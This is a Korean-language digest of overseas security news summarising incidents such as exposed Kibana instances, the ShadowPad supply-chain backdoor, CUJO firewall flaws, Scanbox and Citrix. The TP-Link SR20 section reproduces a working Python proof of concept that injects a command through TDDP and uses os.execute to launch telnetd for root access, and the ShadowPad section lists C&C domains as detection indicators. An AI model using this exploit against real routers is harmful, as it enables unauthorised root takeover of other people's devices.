해외 보안 트렌드

요약

- Kibana :  오픈소스 분석, 시각화 플랫폼으로 Elasticsearch와 연동됨. 

              데이터 분석 시 복잡한 빅데이터 스트림과 로그를 쉽고 빠르게 시각화 하는데 사용 됨. 

              브라우저 기반 인터페이스로 구성되어있으며 Elasticsearch 데이터베이스에서 실시간으로 데이터를 수집하여         

              다양한 형태의 차트, 테이블, 맵등으로 시각화 기능을 수행함.

              초기 설정으로 5601포트에서 사용함.

- 이슈 : 26,000개의 Kibana 인스턴스가 인터넷에 노출 되어 있으며, 대부분 보안이 되지 않고있음   

          https://www.shodan.io/report/Q1dTCJhM                                   

          (Kibana에 자체 보안 기능이 탑재 되어있지 않기 때문일 것으로 추정하나 자체 보안 툴이 존재 하지 않더라도 

           사용자는 서드파티 플러그인(ex, Search Guard) 등을 이용해 인증 보안 기능을 강화할 수 있음)

- 취약점 : 원격 공격자는 악의적인 자바스크립트 코드를 실행하여 호스트 시스템에 임의의 명령어를 실행 할 수 있음.
       

            (1) 서버의 보안이 최적화되어 있을지라도, Elasticsearch가 127.0.0.1/localhost/기타 루프백 주소에 연결이 되어 있고, 

                 elasticsearch 스택에 Kibana 앱이 운영된다면 서버의 가용성에 영향을 미치거나, 비인가 사용자가                         

                 admin권한으로 Kibana 대시보드에 접근할 수 있음. 악성 요소에 대한 추가 권한 상승 등을 초래할 수 있음

                   -> Kibana 인스턴스는 Elasticsearch의 모든 데이터베이스에 대한 접근 가능이 기본으로 설정 되어 있지 

                        않음. Admin이 데이터 사용자의 Kibana 대시보드를 이용한 데이터 접근 권한을 부여하게 되어있음.

             (2) Apache 와 Ngnix 역 프록시 설정이 잘못되어 로그인 페이지가 포트 80번과 8080번으로 제공될 시, 쉽게 우회 

                  가능하며, 접근 제한이 적절하게 이루어지지 않은 경우 Kibana 앱 포트(초기: 포트 5601)로 직접 접속이 가능 함.

- 노출 인스턴스 관련 분야 : e-learning 플랫폼, 금융 시스템, 주차 관리, 병원 관리, 대학교 관리 시스템, 자동 감시 카메라,       

                                    아시아 증권 거래서 등 다양함. 

- 국가별 노출 : Shodan 검색 결과에 따르면 주요 10개국 - 미국(8,311), 중국 (7,282), 독일 (1,709), 프랑스(1,152),                   

                    아일랜드(990), 싱가포르(759), 네덜란드(740), 한국(620), 일본(599), 인도(569)

- 호스팅 서비스별 : 노출 호스트는 대부분 클라우드 서비스를 이용함 – Amazon, Alibaba, Microsoft Azure, Google Cloud

- 영향성 : 많은 수의 서버가 인증없이도 접근이 가능할 수 있어 중요 데이터베이스의 보안이 취약할 수 있음.

- 대응방안 : 최신 소프트웨어로 업데이트 및 노출된 인스턴스에 대해 비밀번호 설정 등을 통해 보안을 강화하고,                   

               기존 서버에 대해 자료 유출이 이루어지지 않는지 모니터링이 필요함.

참고자료

취약점 분석 원문 : https://medium.com/@InfoSecIta/kibana-the-new-toy-for-pentesters-bughunters-hackers-e72048bd98b0
출처 : https://thehackernews.com/2019/04/kibana-data-security.html

요약

- TR-Link SR20 스마트 홈 라우터 : 2016년 출시, 인증절차없이 Root 권한 명령 실행 가능

- 취약원인 : TP-장치, 디버그 프로토콜(TP-Device Debug Protocol,TDDP).  일부 type 1 명령어가 ‘노출’되어 있어 공격에 취약

                (root권한으로 TDDP가 실행되는 것과 관련해 많은 취약점이 발견된 바 있음. TDDP는 총 2가지의 명령으로 실       

                행 됨 - type 1: 인증 필요 없음, type 2: 관리자 계정 요구)

- 취약점 : 설정 검증과 관련된 type 1 명령어 0x1f, request 0x01을 이용해 공격자는 파일이름, 세미콜론(;), 인수를

              포함한 명령을 보내 공격 가능.

- 공격방법 : 

        (1) 공격자는 파일이름, 세미콜론(;)을 포함한 명령어를 보내 실행 가능.

 
        (2) 명령을 보낸 공격자 컴퓨터에 다시 연결해, 해당 파일명과 일치하는 파일을 TFTP(Trivial File Transfer Protocol)을       

            통해 다운 받기를 시도함. 

        (3) TDDP의 주요 프로세서는 파일이 나타날 때까지 최대 4초간 대기함. 

        (4) 파일이 나타나면, 초기화된 Lua 인터프리터에 파일을 로드하고, config 파일의 이름과 원격 주소를 config_test( )함수 

             의 인수로 호출함.

        (5) Config_test( )함수는 원격장비에서 다운로드 된 파일에 의해 제공되기 때문에, 비인가 공격자가 root권한으로           

            호스트에서 명령어를 실행하는 os.execute ( )메소드를 포함하는 인터프리터에 임의의 명령어를 실행할 수 있음.         

            TP-Link SR20 장비의 모든 통제가 가능함.

            (TDDP는 root권한으로 실행되기 때문에, 임의 명령어 실행 또한 root권한으로 행해짐.)

- 대응방안 : 현재 공식 패치는 공개되지 않음 

- 영향성 : tddp 데몬은 모든 인커밍 트래픽에 대한 모든 인터페이스를 수신하도록 설계 되어 있으나, SR20과 함께 제공되는     

             기본 방화벽 규칙이 장비가 속한 로컬 네티워크(LAN)이 아닌 외부에서의 공격을 모두 ‘차단’하도록 설정 되어있음.     

             원격 공격 가능성은 희박함.

관련 CVE정보

- 현재 없음
- PoC : https://pastebin.com/GAzccR95
#!/usr/bin/python3

# Create /testfile in your tftp root directory with the following contents:
#
#function config_test(config)
#  os.execute("telnetd -l /bin/login.sh")
#end
#
# Replace 192.168.0.1 with the IP address of the vulnerable device

import binascii
import socket

port_send = 1040
port_receive = 61000

tddp_ver = "01"
tddp_command = "31"
tddp_req = "01"
tddp_reply = "00"
tddp_padding = "%0.16X" % 00

tddp_packet = "".join([tddp_ver, tddp_command, tddp_req, tddp_reply, tddp_padding])

sock_receive = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock_receive.bind(('', port_receive))

# Send a request
sock_send = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
packet = binascii.unhexlify(tddp_packet)
packet = packet + b"/testfile;arbitrary"
print(packet)
sock_send.sendto(packet, ("192.168.0.1", port_send))
sock_send.close()

response, addr = sock_receive.recvfrom(1024)
r = response.encode('hex')
print(r)

참고자료

출처 : http://www.ehackingnews.com/2019/03/tp-links-sr20-smart-home-router.html?utm_source=dlvr.it&utm_medium=twitter
https://www.bleepingcomputer.com/news/security/zero-day-tp-link-sr20-router-vulnerability-disclosed-by-google-dev/

요약

- 2017년 넷사랑 서버 관리 소프트웨어 패키지에 백도어를 삽입해 배포한 공격.

   (넷사랑 : 은행, 미디어 회사, 에너지 회사, 제약 회사, 통신 사업자, 운송, 물류 등 다양한 분야의 회사가 사용 중)

- 최초 탐지 : 최초 탐지까지 최소 17일 소요.

- 악성 코드 정보 

(1)  특징 : 넷사랑이 판매하는 정상 암호 인증서로 정상 서비스로 위장.

(2)  공격 유형 : 서플라이 체인 공격

(3) 공격 방법 : 넷사랑의 업데이트 매커니즘을 하이재킹해 소프트웨어 업데이트에 백도어 삽입. 

                   공격자는 모든 넷사랑 클라이언트에 악성 코드 배포.

(4) 악성 코드 : Xmanager, Xshell 소프트웨어 패키지의 nssock2.dll 라이브러리에 백도어 삽입. 

                   백도어 코드는 8시간 마다 C&C서버에 도메인 이름, 네트워크 정보, 사용자 이름 등의 감염 컴퓨터 정보를 전송

(5) 백도어 실행 방법 : 특정 도메인에 대한 DNS TXT 기록을 이용해 백도어 실행

º 도메인 이름은 현 년도, 월을 기준으로 작성되었으며 DNS 룩업 기능을 수행

º TXT 기록이 작동 시, C&C DNS 서버는 디크립션 키를 전송

º 백도어 실행 시, ShadowPad 백도어는 프로세스를 실행하고 임의의 코드를 다운로드하고 실행할 수 있는 풀 백도어를 가짐. 

   가상 파일 시스템(vitual file system, VFS)를 레지스트리에 보유.

(6) 백도어 탐지 방법 : 아래 도메인에 DNS 요청을 보낸 이력이 있는지 확인 

º ribotqtonut[.]com

º nylalobghyhirgh[.]com

º jkvmdmjyfcvkf[.]com

º bafyvoruzgjitwr[.]com

º xmponmzmxkxkh[.]com

º tczafklirkl[.]com

º notped[.]com

º dnsgogle[.]com

º operatingbox[.]com

º paniesx[.]com

º techniciantext[.]com

- 영향 받는 제품 : 

º Xmanager Enterprise 5.0 Build 1232

º Xmanager 5.0 Build 1045

º Xshell 5.0 Build 1322

º Xftp 5.0 Build 1218

º Xlpd 5.0 Build 1220

- 2017년 8월 4일, 넷사랑은 악성 소프트웨어를 제거하기 위한 업데이트를 배포

탐지룰 존재유무

- IBM 

취약점명: Trojan.Windows.ShadowPad

탐지룰 : ShadowPad_Request_CnC

탐지장비 : IBM Security Network Protection, Proventia Network IPS

- TrendMicro : 

탐지명 : 2308 - Possible DGA – DNS (Response), 1008571, DNS Request To ShadowPad Domain Detection, 29425

TippinPoint 탐지명 : DNS: ShadowPad Checkin

참고자료

Kaspersky 분석 : https://securelist.com/shadowpad-in-corporate-networks/81432/

출처 : https://thehackernews.com/2017/08/netsarang-server-management.html

   https://www.boannews.com/media/view.asp?idx=56381&kind=1&search=title&find=%B3%DD%BB%E7%B6%FB

요약

- CUJO Smart 방화벽 : 가정용 네트워크에 사용 되며 Amazon 등에서 구입이 가능 함. 악성코드, 피싱 웹사이트, 해킹 방지 기능을 제공. 

- 취약점 : Cisco Talos 팀은 원격 공격자가 네트워크 트래픽을 모니터링하고, 민감한 정보를 훔칠 수 있는 등, 장비를 전적으로 컨트롤 가능하다며 2가지 취약점을 발표함.

(1) Webroot BrightCloud SDK HTTP 헤더 파싱 코드 실행 취약점 (CVE-2018-4012)

: 비인가 공격자가 BrightCloud 서비스로 가장에 장비에 root 사용자로 임의의 코드를 실행할 수 있음 

(BrightCloud SDK : 웹 브라우징 보호에 사용됨. 기본 설정으로 HTTP 연결을 사용해 공격자가 트래픽을 가로챌 수 있음)

(2) CUJO Smart 방화벽 호스트네임 평판 검증 코드 실행 취약점 (CVE-2018-4031)

: 로컬 네트워크의 비인가 공격자가 HTTP요청의 Host 해더를 특정해 커널에 Lua 스크립트룰 실행할 수 있음 

(Lunatik Lua 엔진 : 웹브라우징 보호 목적으로 네트워크 트래픽을 분석하는데 사용 됨)

Lunatik에서 load()함수 사용이 허용되어 공격자가 커널에서 임의의 코드 실행 가능. 임의의 호스트 네임을 추출해 분석 가능

∴ 위 2 취약점을 이용해 CUJO 네트워크의 클라이언트 장비에 Lun 스크립트 삽입과 커널에 코드 실행을 하도록 하는 JavaScript를 이용해 

   강제로 POST 요청을 수행하도록 할 수 있음.

(3) Das U-Boot 검증 부팅 우회 취약점(CVE-2018-3968)

: 부팅 이미지가 장비에 공급이 가능한 경우, 로컬 또는 원격 접근이 가능한 공격자는 레거시 이미지 형식에 포함된 서명되지 않은 커널을 실행 할 수 있음

(4) CUJO Smart 방화벽 dhcpd.conf 검증 부팅 우회 취약점 (CVE-2018-3969)

: 시스템이 부팅되는 동안 공격자는 임의의 시스템 코드를 실행할 수 있음. 또한 /config/dhcpd.conf파일에 시스템 명령어를 삽입해 시스템이 재부팅될때마다 해당 명령어가 실행되게 할 수 있음

     *Cisco Talos 팀은 위 4개의 취약점을 포함 총 11개의 취약점을 발표

- 대응방안 : 최신 버전으로 업데이트 

관련 CVE정보

- CVE-2018-4012, CVE-2018-4031, CVE-2018-3968, CVE-2018-3969

영향성

- 해당 제품 그룹사는 신속한 패치 필요 

참고자료

Cisco Talos 분석 : https://blog.talosintelligence.com/2019/03/vuln-spotlight-cujo.html

출처 : https://threatpost.com/host-of-flaws-found-in-cujo-smart-firewall/142966/

요약

- 파키스탄 여권 정보 확인 사이트(tracking.dgip.gov[.]pk, 파키스탄 이민국의 서브 도메인)에 스캔박스 정찰 프레임워크가 삽입되어, 홈페이지 방문자들을 공격.

- 공격 툴 : 스캔박스 정찰 프레임워크

*지난 주 동일한 툴을 이용해 카이로 방글라데시 대사관이 공격을 받은 바 있음

- 최초 감염 시기: 2019년 3월 2일

- 감염 경로 : Trustwave의 분석에 따르면 스캔박스 자바스크립트 코드가 원격으로 설치가 됨.

- 피해 현황 : 스캔박스를 이용해 웹사이트 방문객의 모든 장치 정보와 방문 당시 사용 키 입력값(keystroke), 77개의 소프트웨어 및 장비 설치 유무를 스캔(보안 프로그램, 가상화, 압축파일 등)

- 스캔박스 정찰 프레임워크(Scanbox Framework)

º 최초 등장 : 2014년

º 사용 그룹 : APT그룹이 주로 사용

º 사용 이력 :  2017년 Stone Panda, 2018년 LuckyMouse 그룹이 사용

º 악용 방법 : 워터링 홀(Watering Hole)공격에 주로 사용 

*워터링 홀 공격 : 방문할 가능성이 높거나 주로 사용되는 웹사이트를 감염시킨 후 잠복하면서 

                       피해자 컴퓨터에 악성 코드를 추가로 설치하는 공격. 

º 공격 시나리오 : 스캔박스 정찰 프레임워크에 감염된 웹사이트에 접근 시 방문객의 IP주소, 디바이스 운영체제, 플러그인, 유저 에이전트 

                       등의 정보를 획득. 획득한 정보를 이용해 구성도 높은 공격 실시. 

- 영향성 : 메이저 보안 장비에서 스캔박스 감염 사실이 탐지가 되지 않음. 현재 해당 사이트가 언제 스캔박스에 감염되었는지 확인되지 않았으나 

              70개의 사이트의 방문자 정보와 방문자 1/3의 로그인 정보가 스캔박스를 통해 탈취된 것을 확인.

- 대응 여부 : 감염 여부를 관리자에게 통지했으나, 아무런 조치가 취해지지 않음. 사이트는 현재 감염 상태. 

- 파키스탄 대상 공격 : 최근 파키스탄 유명 자동차관련 회사 PakWheel(중고/신차 및 자동차 부품 판매)이 공격을 당해 70만명의 계정 정보가 

                              탈취 됨. (https://www.pakwheels.com)

참고자료

Trustwave 분석 : https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/attacker-tracking-users-seeking-pakistani-passport/

출처 : https://www.hackread.com/pakistani-govts-passport-application-tracking-site-hacked-scanbox-framework/

요약

- Citrix : 유명 소프트웨어 회사로 미국 군대, FBI 등 다양한 미국 정부 기관에 서비스를 제공하는 업체.

- Citrix는 지난 주말 국제 사이버 범죄자에 의해 내부 네트워크의 데이트가 유출됐다고 밝힘

- 유출 데이터 : 현재 해커가 정확히 어떤 데이터를 취득했는지 파악하지 못함.

- 사건 경위 : 

(1) 침투 경로 : FBI는 무작위 패스워드 대입 공격으로 내부 네트워크 망 진입에 성공한 후 데이터 유출이 발생한 것으로 추측.

(2) 최초 침투 시기 : 10 년전

(3) 위험성 : 정보보안 회사 Resecurity에 따르면 이 같은 공격은 “특정 대상을 목표로한 계획된 데이터 유출사고”라고 명명.

(4) 과거 공격 이력 : 2018년 12월과 2019년 3월4일  이란 기반 IRIDIUM 해커 그룹은 이메일, 블루프린트, 다른 문서 등을 포함한  

                          6테라바이트 가량의 내부 파일을 탈취.

- IRIDIDUM 해커 그룹 

(1) 공격 이력 : 최근 200곳이 넘는 세계 정부 기관, 유류/가스 회사, 기술 회사 등에 대한 공격의 배후로 지목 됨

(2) 공격 기술 : VPN 채널과 SSO(Single Sign-On)에 대한 비인가 접근을 위해 중요 어플리케이션과 서비스의 다중 인증을 우회하는 기술 사용

(3) 국가 지원의 공격 : 공격대상이 “정부, 군사 산업단지, 에너지회사, 금융 기관 및 대기업의 주요 분야의 핵심 시설”임으로 볼 때, 

                             국가 지원의 정교한 공격으로 해석됨

영향성

정확한 피해 규모 파악을 위해 현재 디지털  포렌식 진행 중 

참고자료

Citrix : https://www.citrix.com/blogs/2019/03/08/citrix-investigating-unauthorized-access-to-internal-network/

Resecurity 분석 : https://resecurity.com/blog/supply-chain-the-major-target-of-cyberespionage-groups/

출처 : https://thehackernews.com/2019/03/citrix-data-breach.html

요약

- 영국 기반 모의해킹/사이버 보안 회사 Pen Test Partner는 Pandora와 Viper 사 제작 차량 알람 시스템이 해킹에 취약하다고 분석 보고서 발표.

- 차량 알람 시스템 : 차량과 스마트키 간의 메시지 전달 방식을 이용한 공격에 대한 예방책으로 사용 되고 있음. 

                           또한 차량 소유주는 앱을 이용해 차량의 위치 검색, 원격 시동 걸기/끄기, 차량 잠금 장치 열기/닫기가 가능함.

- 차량 알람 시스템 안전성 : Pandora사는 자사 시스템이 해킹이 불가능하다며(unhackable) 광고 중

- 취약점 : 모바일 앱 API의 불안전한 직접  사용에 존재하는 직접 객체 참조(direct object reference) 취약점 존재. 

        해당 취약점을 이용해 공격자는 요청값의 파라미터를 조작하는 것만으로도 다른 사용자의 계정에 접근이 가능함

(1) 공통 취약점 : Pandora와 Viper사의 차량 알람 시스템 모두 해킹을 통해 운행  중인 차량 엔진 컨드롤이 가능함 

                     (Viper사의 앱만 테스트에서 엔진 가동 중지에 성공 함)

(2) Pandora앱 : 긴급 구조 요청 전화 시 마이크 접근이 허용되는데, 취약점 공격을 통해 운전자의 대화를 엿들을 수도 있음.

- 공격 재현 : 

(1) 공격자는 모바일 앱 사용자 계정 비밀번호, 이메일 주소를 변경하는 악성 요청값을 보내 비밀번호를 재설정 할 수 있었으며, 

    따라서 계정 권한을 탈취하는데 성공

(2) 계정 권한을 탈취 후에는 다양한 악성 행위가 가능 함

º 차량 정보 획득 : 차량 정보 획득이 가능해 고급 차량만을 대상으로 한 절도 시 활용될 소지 있음

º  실시간 차량 위치 확인 가능

- 공격 시나리오

(1) 공격자는 목표 차량의 실시간 위치를 확인하고 차량을 미행.

(2) 목표 차량이 운행 중일 때, 차량 알람 시스템을 작동하게 해, 운전자가 차량을 정지시키도록 유도.

(3) 해킹한 앱을 이용해 차량 도난방지 시스템을 가동해 차량 운행이 불가하게 만들고, 차량 문을 열고 차량 절도.

- 대응방안 : 현재 두 개의 앱은 패치를 이미 발표함.

*Pen Test Partner는 몇 해전 모바일 앱 해킹을 통해 미쓰비시 아웃랜더 플러그인 하이브리드(PHEV) 차량의 일부 기능을 원격으로 조정할 수 있는 취약점을 발표한 바 있음

(https://www.securityweek.com/researchers-hack-mitsubishi-outlander-phev)

영향성

차량 알람 시스템은 대부분 고가 차량에 사용되고 있어, 취약점 분석 발표는 큰 이슈가 되고 있음

참고자료

Pen Test Partners 취약점 분석 원분 : https://www.pentestpartners.com/security-blog/gone-in-six-seconds-exploiting-car-alarms

출처 : https://www.securityweek.com/flaws-smart-alarms-exposed-millions-cars-dangerous-hacking

요약

*마트로시카 트로잔 : 러시아 인형의 이름에서 유래

- 발견 경위 : Kaspersky Labs 연구진이 유명 토렌트 트랙킹 사이트인 파이럿베이에 호스팅 되는 새로운 파이럿 마트로시카 트로잔 발견

- 빠른 확산 : 연구진에 따르면 현재 10,000건의 트로잔이 삽입된 악성 프로그램을 다운로드 됨

- 악성코드 정보 

(1) 구성 : 마트로시카 트로잔은 PC활용에 쓰이는 정상 프로그램에 트로잔 다운로더를 추가하는 방식으로 구성.

(2) 분포 : 평판이 좋은 토렌트 시더들에 의해서 분포 됨. 과거 악성 행위들을 한 이력이 없는 시더들을 중심으로 배포되고 있음

(3) 구동 방법 : 마트로시카 트로잔이 삽입 된 악성 프로그램을 설치하게 되면 사용자는 다운로드를 완료하기 위해 로그인이 필요하다는 

                    메시지와 함께 파이럿베이 로그인 팝업창을 보게 됨.

사용자가 자신의 아이디와 비밀번호를 넣을 시 공격자는 이를 수집해 새로운 시드 계정을 만들고 악성 코드를 배포 -> 기타 악성 모듈들을 사용자 시스템에 설치

영향성

토렌트 트렉커 사이트 사용 시 각별한 주의 필요

참고자료

Kaspersky 분석 : https://www.kaspersky.com/blog/pirate-matryoshka-malware/25905/?utm_source=twitter&utm_medium=social&utm_campaign=us_kdaily_Zt0106_organic&utm_content=sm-post&utm_term=us_twitter_organic_Zt0106_sm-post_social_kdaily

출처 : https://www.hackread.com/the-pirate-bay-spreading-malware-piratematryoshka-via-reputed-seeders/